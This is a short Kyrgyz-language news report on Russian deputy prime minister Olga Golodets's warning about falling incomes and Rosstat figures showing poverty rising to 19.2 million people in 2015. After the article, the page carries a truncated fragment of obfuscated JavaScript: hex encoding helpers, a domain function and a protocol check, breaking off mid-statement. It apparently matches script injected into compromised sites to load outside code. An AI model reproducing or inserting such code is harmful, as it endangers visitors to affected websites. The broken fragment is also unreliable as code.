Орусия өкмөтүнүн вице-премьери Ольга Голодецтин айтымында, Орусия калкынын кирешеси кескин азайып кеткен. Бул туурасында РИА Новости агенттиги кабарлады.
Орусия бизнес жумалыгында чыгып сүйлөгөн Голодец мындай жагдай жарандардын сатып алуу шартына таасир эте тургандыгын белгиледи. Бул чекене товар айлантуу көлөмүнүн тез арада азайышына алып келет.
Вице-премьердин айтымында, эми айлык акы маселесин талкуулап, иш берүүчүлөр жана жумушчулардын өкүлдөрү менен олуттуу сүйлөшүүлөрдү жүргүзүү керек болот.
Росстаттын 21-марттагы отчету боюнча 2015-жылы начар жашаган орусиялыктардын саны мурунку жылдагыга караганда кыйла жогорулаган. Алардын саны 16 миллион 100 миң адамдан 19 миллион 200 миң адамга чейин жетти. Бул акыркы 9 жыл ичиндеги эң бийик көрсөткүч жана Орусиянын бардык жашоочуларынын 13,4 пайызын түзөт. Бул жөнүндө Forbes жазып чыкты.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kyrgyztoday.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

КОММЕНТАРИЙ КАЛТЫРУУ